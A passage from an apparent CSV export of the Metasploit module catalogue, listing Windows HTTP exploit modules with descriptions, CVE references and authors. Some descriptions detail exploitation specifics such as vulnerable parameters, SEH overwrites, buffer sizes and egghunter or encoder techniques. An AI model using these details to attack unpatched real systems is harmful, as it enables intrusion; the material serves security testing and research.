00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/altn_webadmin.rb","exploit","windows/http/altn_webadmin","exploit/windows/http/altn_webadmin","Alt-N WebAdmin USER Buffer Overflow",200,"Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. 
Successful exploitation could result in code execution with SYSTEM level privileges.","Metasploit Framework License (BSD)","t","2003-06-24 00:00:00",0,,"aggressive","t","BID-8024, CVE-2003-0471, OSVDB-2207, URL-http://www.nessus.org/plugins/index.php?view=single&id=11771","MC " 764,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/amlibweb_webquerydll_app.rb","exploit","windows/http/amlibweb_webquerydll_app","exploit/windows/http/amlibweb_webquerydll_app","Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",300,"This module exploits a stack buffer overflow in Amlib's Amlibweb Library Management System (NetOpacs). The webquery.dll API is available through IIS requests. By specifying an overly long string to the 'app' parameter, SEH can be reliably overwritten allowing for arbitrary remote code execution. In addition, it is possible to overwrite EIP by specifying an arbitrary parameter name with an '=' terminator.","Metasploit Framework License (BSD)","t","2010-08-03 00:00:00",0,,"aggressive","t","BID-42293, OSVDB-66814, URL-http://www.aushack.com/advisories/","patrick " 765,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/apache_chunked.rb","exploit","windows/http/apache_chunked","exploit/windows/http/apache_chunked","Apache Win32 Chunked Encoding",400,"This module exploits the chunked transfer integer wrap vulnerability in Apache version 1.2.x to 1.3.24. This particular module has been tested with all versions of the official Win32 build between 1.3.9 and 1.3.24. Additionally, it should work against most co-branded and bundled versions of Apache (Oracle 8i, 9i, IBM HTTPD, etc). You will need to use the Check() functionality to determine the exact target version prior to launching the exploit. 
The version of Apache bundled with Oracle 8.1.7 will not automatically restart, so if you use the wrong target value, the server will crash.","Metasploit Framework License (BSD)","t","2002-06-19 00:00:00",0,,"aggressive","t","BID-5033, CVE-2002-0392, OSVDB-838, URL-http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html","hdm , jduck " 766,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb","exploit","windows/http/apache_mod_rewrite_ldap","exploit/windows/http/apache_mod_rewrite_ldap","Apache module mod_rewrite LDAP protocol Buffer Overflow",500,"This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations.","Metasploit Framework License (BSD)","t","2006-07-28 00:00:00",0,,"aggressive","t","BID-19204, CVE-2006-3747, EDB-2237, EDB-3680, EDB-3996, OSVDB-27588, URL-http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html","patrick " 767,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/apache_modjk_overflow.rb","exploit","windows/http/apache_modjk_overflow","exploit/windows/http/apache_modjk_overflow","Apache mod_jk 1.2.20 Buffer Overflow",500,"This is a stack buffer overflow exploit for mod_jk 1.2.20. 
Should work on any Win32 OS.","Metasploit Framework License (BSD)","t","2007-03-02 00:00:00",0,,"aggressive","t","BID-22791, CVE-2007-0774, OSVDB-33855, URL-http://www.zerodayinitiative.com/advisories/ZDI-07-008.html","Nicob " 768,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb","exploit","windows/http/avaya_ccr_imageupload_exec","exploit/windows/http/avaya_ccr_imageupload_exec","Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",600,"This module exploits an authentication bypass vulnerability on Avaya IP Office Customer Call Reporter, which allows a remote user to upload arbitrary files through the ImageUpload.ashx component. It can be abused to upload and execute arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.","Metasploit Framework License (BSD)","f","2012-06-28 00:00:00",0,,"aggressive","t","BID-54225, CVE-2012-3811, OSVDB-83399, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-106/, URL-https://downloads.avaya.com/css/P8/documents/100164021","juan vazquez , rgod " 769,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/badblue_ext_overflow.rb","exploit","windows/http/badblue_ext_overflow","exploit/windows/http/badblue_ext_overflow","BadBlue 2.5 EXT.dll Buffer Overflow",500,"This is a stack buffer overflow exploit for BadBlue version 2.5.","BSD License","t","2003-04-20 00:00:00",0,,"aggressive","t","BID-7387, CVE-2005-0595, OSVDB-14238","acaro " 770,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/badblue_passthru.rb","exploit","windows/http/badblue_passthru","exploit/windows/http/badblue_passthru","BadBlue 2.72b PassThru Buffer Overflow",500,"This module exploits a stack buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier.","Metasploit Framework License 
(BSD)","t","2007-12-10 00:00:00",0,,"aggressive","t","BID-26803, CVE-2007-6377, OSVDB-42416","MC " 771,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/bea_weblogic_jsessionid.rb","exploit","windows/http/bea_weblogic_jsessionid","exploit/windows/http/bea_weblogic_jsessionid","BEA WebLogic JSESSIONID Cookie Value Overflow",400,"This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSION cookie value can lead to arbitrary code execution.","Metasploit Framework License (BSD)","t","2009-01-13 00:00:00",1,,"aggressive","t","CVE-2008-5457, OSVDB-51311","pusscat " 772,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/bea_weblogic_post_bof.rb","exploit","windows/http/bea_weblogic_post_bof","exploit/windows/http/bea_weblogic_post_bof","Oracle Weblogic Apache Connector POST Request Buffer Overflow",500,"This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting in a buffer overflow due to the insecure usage of sprintf. Currently, this module works over Windows systems without DEP, and has been tested with Windows 2000 / XP. In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header.","Metasploit Framework License (BSD)","t","2008-07-17 00:00:00",0,,"aggressive","t","BID-30273, CVE-2008-3257, OSVDB-47096","KingCope, juan vazquez " 773,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb","exploit","windows/http/bea_weblogic_transfer_encoding","exploit/windows/http/bea_weblogic_transfer_encoding","BEA Weblogic Transfer-Encoding Buffer Overflow",500,"This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. 
This vulnerability exists in the error reporting for unknown Transfer-Encoding headers. You may have to run this twice due to timing issues with handlers.","Metasploit Framework License (BSD)","t","2008-09-09 00:00:00",0,,"aggressive","t","CVE-2008-4008, OSVDB-49283, URL-http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html","pusscat " 774,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/belkin_bulldog.rb","exploit","windows/http/belkin_bulldog","exploit/windows/http/belkin_bulldog","Belkin Bulldog Plus Web Service Buffer Overflow",200,"This module exploits a stack buffer overflow in Belkin Bulldog Plus 4.0.2 build 1219. When sending a specially crafted HTTP request, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-03-08 00:00:00",0,,"aggressive","t","BID-34033, EDB-8173, OSVDB-54395","MC " 775,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb","exploit","windows/http/ca_arcserve_rpc_authbypass","exploit/windows/http/ca_arcserve_rpc_authbypass","CA Arcserve D2D GWT RPC Credential Information Disclosure",600,"This module exploits an information disclosure vulnerability in the CA Arcserve D2D r15 web server. The information disclosure can be triggered by sending a specially crafted RPC request to the homepage servlet. This causes CA Arcserve to disclose the username and password in cleartext used for authentication. 
This username and password pair are Windows credentials with Administrator access.","Metasploit Framework License (BSD)","t","2011-07-25 00:00:00",0,,"aggressive","t","CVE-2011-3011, EDB-17574, OSVDB-74162","bannedit , rgod" 776,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ca_igateway_debug.rb","exploit","windows/http/ca_igateway_debug","exploit/windows/http/ca_igateway_debug","CA iTechnology iGateway Debug Mode Buffer Overflow",200,"This module exploits a vulnerability in the Computer Associates iTechnology iGateway component. When True is enabled in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads.","Metasploit Framework License (BSD)","t","2005-10-06 00:00:00",0,,"aggressive","t","BID-15025, CVE-2005-3190, EDB-1243, OSVDB-19920, URL-http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485","patrick " 777,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb","exploit","windows/http/ca_totaldefense_regeneratereports","exploit/windows/http/ca_totaldefense_regeneratereports","CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",600,"This module exploits a SQL injection flaw in CA Total Defense Suite R12. 
When supplying a specially crafted SOAP request to '/UNCWS/Management.asmx', an attacker can abuse the reGenerateReports stored procedure by injecting arbitrary SQL statements into the ReportIDs element.","Metasploit Framework License (BSD)","t","2011-04-13 00:00:00",0,,"aggressive","t","CVE-2011-1653, OSVDB-74968, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-134","MC " 778,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/coldfusion_fckeditor.rb","exploit","windows/http/coldfusion_fckeditor","exploit/windows/http/coldfusion_fckeditor","ColdFusion 8.0.1 Arbitrary File Upload and Execute",600,"This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.","Metasploit Framework License (BSD)","t","2009-07-03 00:00:00",0,,"aggressive","t","CVE-2009-2265, OSVDB-55684","MC " 779,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/cyclope_ess_sqli.rb","exploit","windows/http/cyclope_ess_sqli","exploit/windows/http/cyclope_ess_sqli","Cyclope Employee Surveillance Solution v6 SQL Injection",600,"This module exploits a SQL injection found in Cyclope Employee Surveillance Solution. Because the login script does not properly handle the user-supplied username parameter, a malicious user can manipulate the SQL query, which allows arbitrary code execution under the context of 'SYSTEM'.","Metasploit Framework License (BSD)","f","2012-08-08 00:00:00",0,,"aggressive","t","EDB-20393, OSVDB-84517","loneferret, sinn3r " 780,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/easyftp_list.rb","exploit","windows/http/easyftp_list","exploit/windows/http/easyftp_list","EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. 
EasyFTP fails to check input size when parsing the 'path' parameter supplied to an HTTP GET request, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed ""UplusFtp"". Due to limited space, as well as difficulties using an egghunter, the use of staged, ORD, and/or shell payloads is recommended.","Metasploit Framework License (BSD)","t","2010-02-18 00:00:00",0,,"aggressive","t","EDB-11500, OSVDB-66614","ThE g0bL!N, jduck " 781,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/edirectory_host.rb","exploit","windows/http/edirectory_host","exploit/windows/http/edirectory_host","Novell eDirectory NDS Server Host Header Overflow",500,"This module exploits a stack buffer overflow in Novell eDirectory 8.8.1. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect.","Metasploit Framework License (BSD)","t","2006-10-21 00:00:00",0,,"aggressive","t","BID-20655, CVE-2006-5478, OSVDB-29993","MC " 782,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/edirectory_imonitor.rb","exploit","windows/http/edirectory_imonitor","exploit/windows/http/edirectory_imonitor","eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware. NOTE: repeated exploitation attempts may cause eDirectory to crash. 
It does not restart automatically in a default installation.","BSD License","t","2005-08-11 00:00:00",0,,"aggressive","t","BID-14548, CVE-2005-2551, OSVDB-18703","Matt Olney , Unknown" 783,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/efs_easychatserver_username.rb","exploit","windows/http/efs_easychatserver_username","exploit/windows/http/efs_easychatserver_username","EFS Easy Chat Server Authentication Request Handling Buffer Overflow",500,"This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending an overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to ""C:\Program Files\Easy Chat Server"", is concatenated with ""\users\"" and the string passed as the username HTTP parameter.","BSD License","t","2007-08-14 00:00:00",0,,"aggressive","t","BID-25328, CVE-2004-2466, OSVDB-7416","LSO " 784,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ektron_xslt_exec.rb","exploit","windows/http/ektron_xslt_exec","exploit/windows/http/ektron_xslt_exec","Ektron 8.02 XSLT Transform Remote Code Execution",600,"This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The vulnerability exists due to the insecure usage of XslCompiledTransform, using an XSLT controlled by the user. 
The module has been tested successfully on Ektron CMS 8.02 over Windows 2003 SP2, which allows arbitrary code to be executed with NETWORK SERVICE privileges.","Metasploit Framework License (BSD)","t","2012-10-16 00:00:00",0,,"aggressive","t","CVE-2012-5357, URL-http://technet.microsoft.com/en-us/security/msvr/msvr12-016, URL-http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/","Nicolas ""Nicob"" Gregoire, Rich Lundeen, juan vazquez " 785,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ezserver_http.rb","exploit","windows/http/ezserver_http","exploit/windows/http/ezserver_http","EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability",600,"This module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious user sends packets containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique.","Metasploit Framework License (BSD)","f","2012-06-18 00:00:00",0,,"aggressive","t","BID-54056, EDB-19266, OSVDB-83065, URL-http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/","modpr0be " 786,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/fdm_auth_header.rb","exploit","windows/http/fdm_auth_header","exploit/windows/http/fdm_auth_header","Free Download Manager Remote Control Server Buffer Overflow",500,"This module exploits a stack buffer overflow in Free Download Manager Remote Control 2.5 Build 758. 
When sending a specially crafted Authorization header, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-02-02 00:00:00",0,,"aggressive","t","CVE-2009-0183, OSVDB-51745","MC " 787,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_imc_mibfileupload.rb","exploit","windows/http/hp_imc_mibfileupload","exploit/windows/http/hp_imc_mibfileupload","HP Intelligent Management Center Arbitrary File Upload",500,"This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in an insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2013-03-07 00:00:00",0,,"aggressive","t","BID-58385, CVE-2012-5201, OSVDB-91026, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-050/, URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276","juan vazquez , rgod " 788,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb","exploit","windows/http/hp_nnm_getnnmdata_hostname","exploit/windows/http/hp_nnm_getnnmdata_hostname","HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",500,"This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. 
By sending a specially crafted Hostname parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-05-11 00:00:00",0,,"aggressive","t","CVE-2010-1555, OSVDB-64976","MC " 789,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb","exploit","windows/http/hp_nnm_getnnmdata_icount","exploit/windows/http/hp_nnm_getnnmdata_icount","HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow",500,"This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending a specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-05-11 00:00:00",0,,"aggressive","t","CVE-2010-1554, OSVDB-64976","MC " 790,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb","exploit","windows/http/hp_nnm_getnnmdata_maxage","exploit/windows/http/hp_nnm_getnnmdata_maxage","HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow",500,"This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending a specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-05-11 00:00:00",0,,"aggressive","t","CVE-2010-1553, OSVDB-64976","MC " 791,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb","exploit","windows/http/hp_nnm_nnmrptconfig_nameparams","exploit/windows/http/hp_nnm_nnmrptconfig_nameparams","HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",300,"This module exploits a vulnerability in HP NNM's nnmRptConfig.exe. 
A remote user can send a long string to the nameParams parameter via a POST request, which causes an overflow on the stack when function ov.sprintf_new() is used, and gain arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-01-10 00:00:00",,,"aggressive","t","CVE-2011-0266, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-008/","MC , sinn3r " 792,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb","exploit","windows/http/hp_nnm_nnmrptconfig_schdparams","exploit/windows/http/hp_nnm_nnmrptconfig_schdparams","HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",300,"This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during an ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-01-10 00:00:00",,,"aggressive","t","CVE-2011-0267, OSVDB-70473, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-009/","sinn3r " 793,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_openview5.rb","exploit","windows/http/hp_nnm_openview5","exploit/windows/http/hp_nnm_openview5","HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. 
By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-12-06 00:00:00",0,,"aggressive","t","BID-26741, CVE-2007-6204, OSVDB-39530","MC " 794,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb","exploit","windows/http/hp_nnm_ovalarm_lang","exploit/windows/http/hp_nnm_ovalarm_lang","HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute arbitrary code. This specific vulnerability is due to a call to ""sprintf_new"" in the ""isWide"" function within ""ovalarm.exe"". A stack buffer overflow occurs when processing an HTTP request that contains the following: 1. an ""Accept-Language"" header longer than 100 bytes; 2. an ""OVABverbose"" URI variable set to ""on"", ""true"" or ""1"". The vulnerability is related to ""_WebSession::GetWebLocale()"". NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.","Metasploit Framework License (BSD)","f","2009-12-09 00:00:00",0,,"aggressive","t","BID-37347, CVE-2009-4179, OSVDB-60930, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-09-12, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877","jduck " 795,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovas.rb","exploit","windows/http/hp_nnm_ovas","exploit/windows/http/hp_nnm_ovas","HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier. Specifically this vulnerability is caused by a failure to properly handle user supplied input within the HTTP request including headers and the actual URL GET request. 
Exploitation is tricky due to character restrictions. It was necessary to utilize an egghunter shellcode, alphanumerically encoded by muts in the original exploit. If you plan on using this exploit for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably caused by some timeout handling code.","Metasploit Framework License (BSD)","t","2008-04-02 00:00:00",0,,"aggressive","t","BID-28569, CVE-2008-1697, OSVDB-43992","bannedit , muts" 796,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb","exploit","windows/http/hp_nnm_ovbuildpath_textfile","exploit/windows/http/hp_nnm_ovbuildpath_textfile","HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",300,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the ""_OVBuildPath"" function within ""ov.dll"". There are no stack cookies, so exploitation is achieved by overwriting the saved return address. The vulnerability is due to the use of the function ""_OVConcatPath"" which finally uses ""strcat"" in an insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation path. 
If the installation path cannot be guessed the default installation path is used.","Metasploit Framework License (BSD)","f","2011-11-01 00:00:00",0,,"aggressive","t","BID-50471, CVE-2011-3167, OSVDB-76775, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-002/, URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052","Anyway , juan vazquez , sinn3r " 797,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb","exploit","windows/http/hp_nnm_ovwebhelp","exploit/windows/http/hp_nnm_ovwebhelp","HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-12-09 00:00:00",0,,"aggressive","t","BID-37340, CVE-2009-4178, OSVDB-60929","MC " 798,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb","exploit","windows/http/hp_nnm_ovwebsnmpsrv_main","exploit/windows/http/hp_nnm_ovwebsnmpsrv_main","HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the ""main"" function within ""ovwebsnmpsrv.exe"" with a timestamp prior to April 7th, 2010. 
There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.","Metasploit Framework License (BSD)","f","2010-06-16 00:00:00",0,,"aggressive","t","BID-40873, CVE-2010-1964, OSVDB-65552, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-108/","jduck " 799,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb","exploit","windows/http/hp_nnm_ovwebsnmpsrv_ovutil","exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil","HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from ""main"" within ""ovwebsnmpsrv.exe"" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the ""getProxiedStorageAddress"" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. 
It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.","Metasploit Framework License (BSD)","f","2010-06-16 00:00:00",0,,"aggressive","t","BID-40638, CVE-2010-1961, OSVDB-65428, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-106/","jduck " 800,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb","exploit","windows/http/hp_nnm_ovwebsnmpsrv_uro","exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro","HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within ""ovwebsnmpsrv.exe"" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. 
In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.","Metasploit Framework License (BSD)","f","2010-06-08 00:00:00",0,,"aggressive","t","BID-40637, CVE-2010-1960, OSVDB-65427, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-105/","jduck " 801,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_snmp.rb","exploit","windows/http/hp_nnm_snmp","exploit/windows/http/hp_nnm_snmp","HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-12-09 00:00:00",0,,"aggressive","t","CVE-2009-3849, OSVDB-60933","MC " 802,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb","exploit","windows/http/hp_nnm_snmpviewer_actapp","exploit/windows/http/hp_nnm_snmpviewer_actapp","HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the ""snmpviewer.exe"" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within ""snmpviewer.exe"" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. It is important to note that this vulnerability must be exploited by overwriting SEH. 
